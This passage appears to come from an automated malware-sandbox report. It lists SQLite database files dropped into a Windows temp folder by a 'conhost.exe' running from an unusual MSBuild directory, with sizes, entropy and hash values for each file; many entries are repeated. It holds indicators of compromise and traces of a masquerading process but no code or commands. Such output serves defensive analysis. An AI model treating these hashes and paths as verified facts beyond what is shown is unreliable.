                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Br1PSAOT8a

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\BuJ4t1oyHW

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\C24CrujGfu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Ciak75H4AT

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\CwMt7bcHRC

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DD2edtdqtd

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DDvSsmjtpi

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DNmksqN4xo

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DXmKq18qjf

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\DwfjkLxx3h

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\EZUK6wT2fs

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Ed6V3YDlvI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\EoVx0OUOoI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Ew1WvbFVwh

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\FGR9CJDNPx

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Fley9WoZPq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\FmJXJ8jLxc

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\FrjkeQmAk5

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Fu2umj89xv

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\GNLabV2Ykv

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\GREWlFOgP4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\GV7A6dmMNf

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\HVm4DAR9Q6

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\ILxWYyh7K0

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
